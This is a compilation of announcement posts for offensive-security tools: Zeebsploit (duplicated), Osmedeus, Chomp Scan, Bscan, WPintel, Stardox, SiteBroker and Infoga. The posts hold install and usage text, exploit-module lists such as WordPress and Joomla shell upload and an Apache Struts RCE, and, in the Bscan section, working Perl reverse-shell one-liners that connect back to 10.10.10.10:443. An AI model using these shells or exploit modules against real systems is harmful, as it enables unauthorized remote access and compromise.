Zeebsploit – Web Scanner / Exploitation / Information Gathering

zeebsploit is a tool for hackingsearching for web information andscanning vulnerabilities of a webInstallation & Usageapt-get install gitgit clone https://github.com/jaxBCD/Zeebsploit.gitcd Zeebsploitchmod +x install./installpython3 zeebsploit.pytype ‘help’ for show modulesand follow instructionModules[Main modules]+———-+——————————-+| Modules | Description |+———-+——————————-+| Exploit | Exploitation Modules || Scanners | Scanners Modules || infoga | information Gathering Modules |+———-+——————————-+[Exploit Modules]+—————————+————————————————–+| Modules | Description |+—————————+————————————————–+| wp content injection | wordpress content injection version 4.7 or 4.7.1 || wp revslider | wordpress plugin revslider remote file upload || wp learndash | wordpress leardash remote file upload || wp swhobiz | wordpress plugin showbiz remote file upload || joomla com fabrik | joomla component fabrik file upload || joomla manager get config | joomla component manager auto get config || joomla jdownload | joomla component jdownloads remote file upload || joomla | Joomla ads manager component auto shell upload || apache struts rce | CVE: 2017-5638 – Apache Struts2 S2-045 || | remote command execution || drupal8 rce | drupal version 8 remote command execution || dvr cam leak credential | TBK DVR4104 / DVR4216 || | – Credentials Leak (Get User and password || webdav file upload | Nothing || —More— | Coming Soon the following version |+—————————+————————————————–+[Scanner Module]+——————–+—————————————-+| Modules | Description |+——————–+—————————————-+| subdomain scanner | Scan Subdomain for Web || sqli scanner | Scan Sql Injection Vulnerability || xss scanner | Scan XSS Injection Vulnerability || lfi scanner | Local File Includes Scanner etc/passwd || admin login finder | Scan Admin Login page || directory scanner | scan directory on web us e dirhunt || subdomain takeover | scan type subdomain takeover || —More— | Coming Soon the following version |+——————–+—————————————-+[Information Gathering]+——————–+——————————————+| Modules | Description |+——————–+——————————————+| cms detector | a tool for detecting cms on a web || port scanner | Scan Open Port use Nmap || information header | response header information || ip geolocation | detect the location of an ip or host || email searcher | searching email from web || traceroute | to show the route the package has pas sed || robot.txt detector | Scan Robot.txt from Web || header information | Response Header Checker || whois lookup | looking for registered users or || | recipients of Internet resource rights || —More— | Coming Soon the following version |+——————–+——————————————+Join Team : [Click This]Contact : [Contact]Download Zeebsploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/9xaMRbIv1Dk/zeebsploit-web-scanner-exploitation.html

Zeebsploit – Web Scanner / Exploitation / Information Gathering

zeebsploit is a tool for hackingsearching for web information andscanning vulnerabilities of a webInstallation & Usageapt-get install gitgit clone https://github.com/jaxBCD/Zeebsploit.gitcd Zeebsploitchmod +x install./installpython3 zeebsploit.pytype ‘help’ for show modulesand follow instructionModules[Main modules]+———-+——————————-+| Modules | Description |+———-+——————————-+| Exploit | Exploitation Modules || Scanners | Scanners Modules || infoga | information Gathering Modules |+———-+——————————-+[Exploit Modules]+—————————+————————————————–+| Modules | Description |+—————————+————————————————–+| wp content injection | wordpress content injection version 4.7 or 4.7.1 || wp revslider | wordpress plugin revslider remote file upload || wp learndash | wordpress leardash remote file upload || wp swhobiz | wordpress plugin showbiz remote file upload || joomla com fabrik | joomla component fabrik file upload || joomla manager get config | joomla component manager auto get config || joomla jdownload | joomla component jdownloads remote file upload || joomla | Joomla ads manager component auto shell upload || apache struts rce | CVE: 2017-5638 – Apache Struts2 S2-045 || | remote command execution || drupal8 rce | drupal version 8 remote command execution || dvr cam leak credential | TBK DVR4104 / DVR4216 || | – Credentials Leak (Get User and password || webdav file upload | Nothing || —More— | Coming Soon the following version |+—————————+————————————————–+[Scanner Module]+——————–+—————————————-+| Modules | Description |+——————–+—————————————-+| subdomain scanner | Scan Subdomain for Web || sqli scanner | Scan Sql Injection Vulnerability || xss scanner | Scan XSS Injection Vulnerability || lfi scanner | Local File Includes Scanner etc/passwd || admin login finder | Scan Admin Login page || directory scanner | scan directory on web us e dirhunt || subdomain takeover | scan type subdomain takeover || —More— | Coming Soon the following version |+——————–+—————————————-+[Information Gathering]+——————–+——————————————+| Modules | Description |+——————–+——————————————+| cms detector | a tool for detecting cms on a web || port scanner | Scan Open Port use Nmap || information header | response header information || ip geolocation | detect the location of an ip or host || email searcher | searching email from web || traceroute | to show the route the package has pas sed || robot.txt detector | Scan Robot.txt from Web || header information | Response Header Checker || whois lookup | looking for registered users or || | recipients of Internet resource rights || —More— | Coming Soon the following version |+——————–+——————————————+Join Team : [Click This]Contact : [Contact]Download Zeebsploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/RZKskKnsCFU/zeebsploit-web-scanner-exploitation_10.html

Osmedeus – Fully Automated Offensive Security Tool For Reconnaissance And Vulnerability Scanning

Osmedeus allow you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target.How to useIf you have no idea what are you doing just type the command below or check out the Advance Usage./osmedeus.py -t example.comInstallationgit clone https://github.com/j3ssie/Osmedeuscd Osmedeus./install.shThis install only focus on Kali linux, check more install on Wiki pageFeaturesSubdomain Scan.Subdomain TakeOver Scan.Screenshot the target.Basic recon like Whois, Dig info.IP Discovery.CORS Scan.SSL Scan.Headers Scan.Port Scan.Vulnerable Scan.Seperate workspaces to store all scan output and details logging.REST API.SPA Web UI.Slack notifications.DemoScreenshotsContact@j3ssiejjjDownload Osmedeus

Link: http://feedproxy.google.com/~r/PentestTools/~3/DCeXRDXo4J0/osmedeus-fully-automated-offensive.html

Chomp Scan – A Scripted Pipeline Of Tools To Streamline The Bug Bounty/Penetration Test Reconnaissance Phase

A scripted pipeline of tools to simplify the bug bounty/penetration test reconnaissance phase, so you can focus on chomping bugs.ScopeChomp Scan is a Bash script that chains together the fastest and most effective tools (in my opinion/experience) for doing the long and sometimes tedious process of recon. No more looking for word lists and trying to remember when you started a scan and where the output is. Chomp Scan creates a timestamped output directory based on the search domain, e.g. example.com-21:38:15, and puts all tool output there, split into individual sub-directories as appropriate. Custom output directories are also supported via the -o flag.New: Chomp Scan now integrates Notica, which allows you to receive a notification when the script finishes. Simply visit Notica and get a unique URL parameter. Simply pass the parameter to Chomp Scan via the -n flag, keep the Notica page open in a browser tab on your computer or phone, and you will receive a message when Chomp Scan has finished running. No more constantly checking/forgetting to check those long running scans.Chomp Scan runs in multiple modes. The primary one is using command-line arguments to select which scanning phases to use, which wordlists, etc. A guided interactive mode is available, as well as a non-interactive mode, useful if you do not want to deal with setting multiple arguments.A list of interesting words is included, such as dev, test, uat, staging, etc., and domains containing those terms are flagged. This way you can focus on the interesting domains first if you wish. This list can be customized to suit your own needs, or replaced with a different file via the -X flag.A blacklist file is included, to exclude certain domains from the results. However it does not prevent those domains from being resolved, only from being used for port scanning and content discovery. It can be passed via the -b flag.Chomp Scan supports limited canceling/skipping of tools by pressing Ctrl-c. This can sometimes have unintended side effects, so use with care.Note: Chomp Scan is in active development, and new/different tools will be added as I come across them. Pull requests and comments welcome!Scanning PhasesSubdomain Discovery (3 different sized wordlists)dnscansubfindersublist3rmassdns + altdnsScreenshots (optional)aquatonePort Scanning (optional)masscan and/or nmapnmap output styled with nmap-bootstrap-xslInformation Gathering (optional) (4 different sized wordlists)subjackbfacwhatwebwafw00fniktoContent Discovery (optional) (4 different sized wordlists)ffufgobusterdirsearchWordlistsA variety of wordlists are used, both for subdomain bruteforcing and content discovery. Daniel Miessler’s Seclists are used heavily, as well as Jason Haddix’s lists. Different wordlists can be used by passing in a custom wordlist or using one of the built-in named argument lists below.Subdomain Bruteforcing Argument Name Filename Word Count Description short subdomains-top1mil-20000.txt 22k From Seclists long sortedcombined-knock-dnsrecon-fierce-reconng.txt 102k From Seclists huge huge-200k.txt 199k Combination I made of various wordlists, including Seclists Content Discovery Argument Name Filename Word Count Description small big.txt 20k From Seclists medium raft-large-combined.txt 167k Combination of the raft wordlists in Seclists large seclists-combined.txt 215k Larger combination of all the Discovery/DNS lists in Seclists xl haddix_content_discovery_all.txt 373k Jason Haddix’s all content discovery list xxl haddix-seclists-combined.txt 486k Combination of the two previous lists Misc.altdns-words.txt – 240 words – Used for creating domain permutations for masscan to resolve. Borrowed from altdns.interesting.txt – 43 words – A list I created of potentially interesting words appearing in domain names. Provide your own interesting words list with the -X flag.InstallationClone this repo and run the installer.sh script. Make sure to source ~/.profile after running the installer in order to add the Go binary path to your $PATH variable. Then run Chomp Scan.UsageChomp Scan always runs subdomain enumeration, thus a domain is required via the -u flag. The domain should not contain a scheme, e.g. http:// or https://. By default, HTTPS is always used. This can be changed to HTTP by passing the -H flag. A wordlist is optional, and if one is not provided the built-in short list (20k words) is used.Other scan phases are optional. Content discovery can take an optional wordlist, otherwise it defaults to the built-in short (22k words) list.The final results of the scan are stored in two text files in the output directory. All unique domains that are found are stored in all_discovered_domains.txt, and all unique IPs that are discovered are stored in all_discovered_ips.txt.chomp-scan.sh -u example.com -a d short -cC large -p -o path/to/directoryUsage of Chomp Scan: -u domain (required) Domain name to scan. This should not include a scheme, e.g. https:// or http://. -d wordlist (optional) The wordlist to use for subdomain enumeration. Three built-in lists, short, long, and huge can be used, as well as the path to a custom wordlist. The default is short. -c (optional) Enable content discovery phase. The wordlist for this option defaults to short if not provided. -C wordlist (optional) The wordlist to use for content discovery. Five built-in lists, small, medium, large, xl, and xxl can be used, as well as the path to a custom wordlist. The default is small. -s (optional) Enable screenshots using Aquatone. -i (optional) Enable information gathering phase, using subjack, bfac, whatweb, wafw00f, and nikto. -p (optional) Enable portscanning phase, using masscan (run as root) and nmap. -I (optional) Enable interactive mode. This allows you to select certain tool options and inputs interactively. This cannot be run with -D. -D (optional) Enable default non-interactive mode. This mode uses pre-selected defaults and requires no user interaction or options. This cannot be run with -I. Options: Subdomain enumeration wordlist: short. Content discovery wordlist: small. Aquatone screenshots: yes. Portscanning: yes. Information gathering: yes. Domains to scan: all unique discovered. -b wordlist (optional) Set custom domain blacklist file. -X wordlist (optional) Set custom interesting word list. -o directory (optional) Set custom output directory. It must exist and be writable. -a (optional) Use all unique discovered domains for scans, rather than interesting domains. This cannot be used with -A. -A (optional, default) Use only interesting discovered domains for scans, rather than all discovered domains. This cannot be used with -a. -H (optional) Use HTTP for connecting to sites instead of HTTPS. -h (optional) Display this help page.In The FutureChomp Scan is still in active development, as I use it myself for bug hunting, so I intend to continue adding new features and tools as I come across them. New tool suggestions, feedback, and pull requests are all welcomed. Here is a short list of potential additions I’m considering:Adding a config file, for more granular customization of tools and parametersAdding testing/support for Ubuntu/DebianA possible Python re-write (and maybe a Go re-write after that!)The generation of an HTML report, similar to what aquatone providesExamplesDownload Chomp-Scan

Link: http://www.kitploit.com/2019/03/chomp-scan-scripted-pipeline-of-tools.html

Bscan – An Asynchronous Target Enumeration Tool

Synopsisbscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.Installationbscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.Download the latest packaged version from PyPI:pip install bscanOr get the bleeding-edge version from version control:pip install https://github.com/welchbj/bscan/archive/master.tar.gzBasic Usagebscan has a wide variety of configuration options which can be used to tune scans to your needs. Here’s a quick example:$ bscan \> –max-concurrency 3 \> –patterns [Mm]icrosoft \> –status-interval 10 \> –verbose-status \> scanme.nmap.orgWhat’s going on here?–max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time–patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output–status-interval 10 tells bscan to print runtime status updates every 10 seconds–verbose-status means that each of these status updates will print details of all currently-running scan subprocessesscanme.nmap.org is the host upon which we want to enumeratebscan also relies on some additional configuration files. The default files can be found in the bscan/configuation directory and serve the following purposes:patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan outputrequired-programs.txt specifies the installed programs that bscan plans on usingport-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan outputservice-scans.toml defines the scans be run on the target(s) on a per-service basisDetailed OptionsHere’s what you should see when running bscan –help:usage: bscan [OPTIONS] targets _| |__ ___ ___ __ _ _ __| ‘_ \/ __|/ __/ _` | ‘_ \| |_) \__ \ (__ (_| | | | ||_.__/|___/\___\__,_|_| |_|an asynchronous service enumeration toolpositional arguments: targets the targets and/or networks on which to perform enumerationoptional arguments: -h, –help show this help message and exit –brute-pass-list F filename of password list to use for brute-forcing –brute-user-list F filename of user list to use for brute-forcing –cmd-print-width I the maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80) –config-dir D the base directory from which to load the configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program –hard force overwrite of existing directories –max-concurrency I maximum integer number of subprocesses permitted to be running concurrently (defaults to 20) –no-program-check disable checking the presence of required system programs –no-file-check disable checking the presence of files such as configured wordlists –no-service-scans disable running scans on discovered services –output-dir D the base directory in which to write output files –patterns [ [ …]] regex patterns to highlight in output text –ping-sweep enable ping sweep filtering of hosts from a network range before running more intensive scans –quick-only whether to only run the quick scan (and not include the thorough scan over all ports) –qs-method S the method for performing the initial TCP port scan; must correspond to a configured port scan –status-interval I integer number of seconds to pause in between printing status updates; a non-positive value disables updates (defaults to 30) –ts-method S the method for performing the thorough TCP port scan; must correspond to a configured port scan –udp whether to run UDP scans –udp-method S the method for performing the UDP port scan; must correspond to a configured port scan –verbose-status whether to print verbose runtime status updates, based on frequency specified by `–status-interval` flag –version program version –web-word-list F the wordlist to use for scansCompanion ToolsThe main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here’s a simple example:$ bscan-wordlists –find “*win*"/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt/usr/share/wordlists/metasploit/sensitive_files_win.txt/usr/share/seclists/Passwords/common-passwords-win.txtTry bscan-wordlists –help to explore other options.bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here’s a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:$ bscan-shells –port 443 10.10.10.10 | grep -i -A1 perlperl for windowsperl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’perl with /bin/shperl -e ‘use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’perl without /bin/shperl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells –help to explore other options.DevelopmentStart by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):# setup the environmentmkvirtualenv -p $(which python3) bscan-devworkon bscan-dev# get the depspip install -r dev-requirements.txtLint and type-check the project (these are run on Travis, too):flake8 . && mypy bscanWhen it’s time to package a new release:# build source and wheel distributionspython setup.py bdist_wheel sdist# run post-build checkstwine check dist/*# upload to PyPItwine upload dist/*Download Bscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

WPintel – Chrome Extension Designed For WordPress Vulnerability Scanning And Information Gathering

WordPress Vulnerability Scanner – Scan for vulnerabilities, version, themes, plugins and much more!WPintel allows you to scan self hosted WordPress sites.With WPintel you can detect the following:VersionVersion vulnerabilitiesPluginsThemesUsersand much more!Although WPintel is designed for self hosted (wordpress.org) WordPress sites, some of it’s functionalities still work for sites hosted on wordpress.com.VideoDownload WPintel

Link: http://www.kitploit.com/2019/01/wpintel-chrome-extension-designed-for.html

Stardox – Github Stargazers Information Gathering Tool

Stardox is an advanced github stargazers information gathering tool. It scraps Github for information and display them in list tree view.It can be used for collecting information of your’s/someones repository stargazers details.What data it fetchs :Total repsitoriesTotal starsTotal FollowersTotal FollowingP.S: Many new things will be added soon.GalleryFetching data of repository. List tree view of fetched data. Getting StartedSteps to setup :git clone https://github.com/0xprateek/stardoxcd stardoxpython ./setup.py installStarting Stardox :cd stardox/srcpython3 stardox.pyExample Usage : `python3 ./stardox.pyDownload Stardox

Link: http://feedproxy.google.com/~r/PentestTools/~3/kAWqztoZ97E/stardox-github-stargazers-information.html

SiteBroker – A Cross-Platform Python Based Utility For Information Gathering And Penetration Testing Automation!

A cross-platform python based utility for information gathering and penetration automation!OutputSitebroker’s Full OutputRequirementsPython (2.7.*)Python pipPython module requestsPython module coloramaPython module dnspythonPython module lxmlPython module bs4Install modulespip install -r requirements.txtTested onWindows 7/8/8.1Kali linux (2017.2)Download SiteBrokerYou can download the latest version of SiteBroker by cloning the GitHub repository.git clone https://github.com/Anon-Exploiter/SiteBrokerUpdatesChanged The Whole Script Into Python (Previously It Was Written In PHP)Exceptions Covered for both User Interrupting && Internel Issues!Removed NetCraft Module as We need to use selinium and phantomJS for it (Ultimately making script slow!)Changed the Problem Of Responce Code Of ‘200’ for most sites in Admin Panel Finder Module && Shell Finder ModuleChange-logAdded New Features For Reverse IP (Via HackerTarget && YouGetSignal)Added New Features For Crawling (Via Google, Bing && Manually With My Hands ;)Added New Method For Subdomains Scanning! (Takes Some Time Though :p)UsageInitializing Scriptpython SiteBroker.pyAdvanced UsageAuthor: Syed Umar Arfeen (An0n 3xPloiTeR)Usage: python SiteBroker.pyA cross-platform python based utility for information gathering and penetration automation!Options: 1). Cloudflare Bypass. 2). Website Crawler. |____ Google Based Crawling |____ Bing Based Crawling |____ Manually Crawling 3). Reverse IP. |____ YouGetSignal Based |____ HackerTarget’s API Based 4). Information Gathering. |____ Whois Lookup |____ BrowserSpy Report 5). Nameservers. 6). WebSite Speed. 7). Subdomains Scanner 8). Shell Finder. 9). Admin Panel Finder. 10). Grab Banner. 11). All Things. Example: python SiteBroker.pyScreenshotsDownload SiteBroker

Link: http://feedproxy.google.com/~r/PentestTools/~3/9uXfhpdgDLs/sitebroker-cross-platform-python-based.html

Infoga – Email OSINT

Infoga is a tool gathering email accounts informations (ip,hostname,country,…) from different public source (search engines, pgp key servers and shodan) and check if emails was leaked using haveibeenpwned.com API. Is a really simple tool, but very effective for the early stages of a penetration test or just to know the visibility of your company in the Internet. Installation$ git clone https://github.com/m4ll0k/Infoga.git infoga$ cd infoga$ python setup.py install$ python infoga.pyUsage$ python infoga.py –domain nsa.gov –source all –breach -v 2 –report ../nsa_gov.txt$ python infoga.py –info m4ll0k@protonmail.com –breach -v 3 –report ../m4ll0k.txtDownload Infoga

Link: http://feedproxy.google.com/~r/PentestTools/~3/qcMnDjIfkHQ/infoga-email-osint.html